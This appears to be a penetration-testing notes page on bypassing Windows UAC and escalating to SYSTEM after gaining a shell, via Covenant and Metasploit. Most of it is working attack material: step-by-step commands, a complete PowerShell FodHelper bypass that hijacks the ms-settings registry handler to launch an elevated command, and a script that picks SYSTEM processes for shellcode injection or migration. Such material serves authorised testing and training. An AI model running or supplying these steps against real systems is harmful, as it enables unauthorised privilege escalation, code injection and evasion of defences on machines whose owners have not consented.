# UAC Bypass

* We assume that we already have a shell on the target, running as a user who is a member of the local Administrators group but whose token is the filtered, medium-integrity one that UAC hands out (the usual case for an interactive admin user). A UAC bypass does not turn a standard user into an administrator; it only removes the prompt for a user who is already entitled to elevate.

## With Covenant

* Import the helper.ps1 script into the grunt with the `PowerShellImport` task
* Copy an encoded launcher from the Launchers section of Covenant
* Run this command, pasting your launcher in place of the placeholder and closing the quote: `PowerShell helper -custom "cmd.exe /c <Launcher-HERE>"`
* You will get a new grunt as the same user, but this one runs in a high-integrity (elevated) context
* If you type `ps` in the new grunt, you should now also see the processes running as administrators and SYSTEM
* To get a SYSTEM shell we download a grunt as shellcode
* To do so, go to Grunts, select shellcode, click Generate and download the `.bin`
* Back in the most recent (elevated) grunt, type `inject`, select the binary, give it the PID of a process running as SYSTEM and click Execute
* We should now have a shell as SYSTEM
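The `helper -custom` call above wraps the FodHelper UAC bypass described in the Resources below. As an added example that is not the page's helper.ps1 nor Covenant's code, the following PowerShell performs the same bypass stand-alone, with the checks that decide whether it can work at all. Names such as `Get-UacContext`, `Invoke-FodhelperBypass` and the proof file under `$env:TEMP` are assumptions of this example; the registry path, the `DelegateExecute` trick and the integrity SIDs are the documented mechanism. `fodhelper.exe` is auto-elevated and resolves the `ms-settings:` handler through HKCU first, so a user-writable key decides what it launches.

```powershell
# Added example of the FodHelper UAC bypass (not the page's helper.ps1).
# Run from a 64-bit PowerShell as a member of Administrators with a filtered token.

function Get-UacContext {
    # whoami /groups prints every SID in the token, including the integrity label.
    $groups = whoami /groups
    $policy = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    [pscustomobject]@{
        InAdminGroup = [bool]($groups | Select-String -SimpleMatch 'S-1-5-32-544')   # BUILTIN\Administrators
        Elevated     = [bool]($groups | Select-String -SimpleMatch 'S-1-16-12288')   # High Mandatory Level
        UacEnabled   = ($policy.EnableLUA -ne 0)
        # 2 = "Always notify": auto-elevation is off and this bypass will only produce a prompt
        ConsentPromptBehaviorAdmin = $policy.ConsentPromptBehaviorAdmin
    }
}

function Invoke-FodhelperBypass {
    param([Parameter(Mandatory)][string]$Command)
    $key = 'HKCU:\Software\Classes\ms-settings\Shell\Open\command'
    New-Item -Path $key -Force | Out-Null
    # An empty DelegateExecute makes the shell fall back to the (Default) command line
    New-ItemProperty -Path $key -Name 'DelegateExecute' -Value '' -Force | Out-Null
    Set-ItemProperty -Path $key -Name '(default)' -Value $Command -Force
    try {
        Start-Process -FilePath "$env:windir\System32\fodhelper.exe" -WindowStyle Hidden
        Start-Sleep -Seconds 3
    } finally {
        # Remove the hijacked handler so the artefact does not linger in HKCU
        Remove-Item -Path 'HKCU:\Software\Classes\ms-settings' -Recurse -Force -ErrorAction SilentlyContinue
    }
}

$ctx = Get-UacContext
if (-not $ctx.UacEnabled)                  { Write-Host 'UAC is disabled, no bypass needed'; return }
if ($ctx.Elevated)                         { Write-Host 'Already high integrity'; return }
if (-not $ctx.InAdminGroup)                { Write-Host 'Not in Administrators, a UAC bypass cannot help'; return }
if ($ctx.ConsentPromptBehaviorAdmin -eq 2) { Write-Host 'UAC is set to Always notify, FodHelper will prompt'; return }

# Proof-of-elevation payload (assumed for this example): the elevated cmd.exe writes its
# own token groups to a file. Replace the command with "cmd.exe /c <Launcher-HERE>" to
# start the Covenant launcher instead.
$proof = Join-Path $env:TEMP 'uac_check.txt'
Invoke-FodhelperBypass -Command "cmd.exe /c whoami /groups > `"$proof`""

if ((Test-Path $proof) -and (Select-String -Path $proof -SimpleMatch 'S-1-16-12288')) {
    Write-Host "Elevated: High Mandatory Level found in $proof"
} else {
    Write-Host 'Bypass did not produce an elevated process'
}
Remove-Item $proof -Force -ErrorAction SilentlyContinue
```

The pre-checks are what most "it did not work" cases come down to: the user is not actually in Administrators, the token is already high integrity, or UAC is at "Always notify" (`ConsentPromptBehaviorAdmin` = 2), where no auto-elevating binary can be abused silently. Defender flags the registry write itself, which is what the "Bypassing Defender" resource below is about.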

## With Metasploit

* Interact with the current session using `sessions -i <id-of-session>`
* Type `run post/multi/recon/local_exploit_suggester`
* If the target is vulnerable, the list should contain entries like these (note that `always_install_elevated` is a separate misconfiguration, not a UAC bypass)

  ```
  [+] 192.168.3.4 - exploit/windows/local/always_install_elevated: The target is vulnerable.
  [+] 192.168.3.4 - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable.
  ```
* Background the session with Ctrl+Z (or `background`)
* `use exploit/windows/local/bypassuac_dotnet_profiler`
* `set SESSION <id>` to the id of the session we have on the target
* Then `exploit -j`
* We should get a new session
* `getuid` still shows the same user, but this session runs in a high-integrity (elevated) context
* List processes using `ps`, find one running as SYSTEM and note its process id
* Type `migrate <process-id>`
* Now `getuid` should return `NT AUTHORITY\SYSTEM`
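Both the Covenant `inject` step and the Meterpreter `migrate` step above need a PID of a process that already runs as SYSTEM. As an added example that is not Covenant's or Metasploit's code, this PowerShell, run from the elevated shell, lists the candidates and prefers the ones that are usually safe to inject into. `Get-SystemProcessCandidates` and the preference list are assumptions of this example; the WMI `Win32_Process.GetOwner` method and the architecture check are standard.

```powershell
# Added example: enumerate SYSTEM processes to pick a target PID for inject/migrate.
# Requires the high-integrity context obtained by the UAC bypass (SeDebugPrivilege).

function Get-SystemProcessCandidates {
    param(
        # Stable, long-lived services are the usual choices; order expresses preference.
        [string[]]$Prefer = @('spoolsv.exe', 'winlogon.exe', 'svchost.exe'),
        # Protected or fragile processes that should not be touched.
        [string[]]$Avoid  = @('lsass.exe', 'csrss.exe', 'smss.exe', 'wininit.exe', 'services.exe')
    )
    # The shellcode must match the target's bitness; this shell's bitness is the reference.
    $is64 = [Environment]::Is64BitProcess

    Get-CimInstance Win32_Process | ForEach-Object {
        $owner = Invoke-CimMethod -InputObject $_ -MethodName GetOwner
        if ($owner.ReturnValue -ne 0) { return }            # access denied (e.g. PPL) or exited
        if ($owner.Domain -ne 'NT AUTHORITY' -or $owner.User -ne 'SYSTEM') { return }
        if ($Avoid -contains $_.Name) { return }
        $proc = Get-Process -Id $_.ProcessId -ErrorAction SilentlyContinue
        if (-not $proc) { return }
        # Get-Process exposes whether a process is WOW64 only via its modules; use the
        # main module path instead: SysWOW64 binaries are 32-bit on a 64-bit host.
        $path = $_.ExecutablePath
        $target64 = -not ($path -and $path -like '*\SysWOW64\*')
        if ($target64 -ne $is64) { return }
        [pscustomobject]@{
            Pid   = $_.ProcessId
            Name  = $_.Name
            Path  = $path
            Rank  = [Math]::Max(0, $Prefer.IndexOf($_.Name))   # -1 (not preferred) sorts last
            Pref  = ($Prefer -contains $_.Name)
        }
    } | Sort-Object @{Expression = 'Pref'; Descending = $true}, Rank, Pid
}

$candidates = Get-SystemProcessCandidates
$candidates | Format-Table Pid, Name, Path -AutoSize
if ($candidates) {
    Write-Host "Suggested target for inject/migrate: PID $($candidates[0].Pid) ($($candidates[0].Name))"
} else {
    Write-Host 'No SYSTEM process visible; the shell is probably not elevated yet'
}
```

If the list is empty the shell is almost certainly still medium integrity: without the elevated token, `GetOwner` on SYSTEM processes fails, which is the same reason `ps` in Covenant or Meterpreter does not show them before the bypass.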

## Resources

* To understand more about FodHelper:

{% embed url="https://tcm-sec.com/bypassing-defender-the-easy-way-fodhelper/" %}
Bypassing Defender The Easy Way – FodHelper by Joe Helle
{% endembed %}

{% embed url="https://academy.tcm-sec.com/p/movement-pivoting-and-persistence-for-pentesters-and-ethical-hackers" %}
TCM Security Academy - Movement, Pivoting and Persistence for Pentesters and Ethical Hackers
{% endembed %}
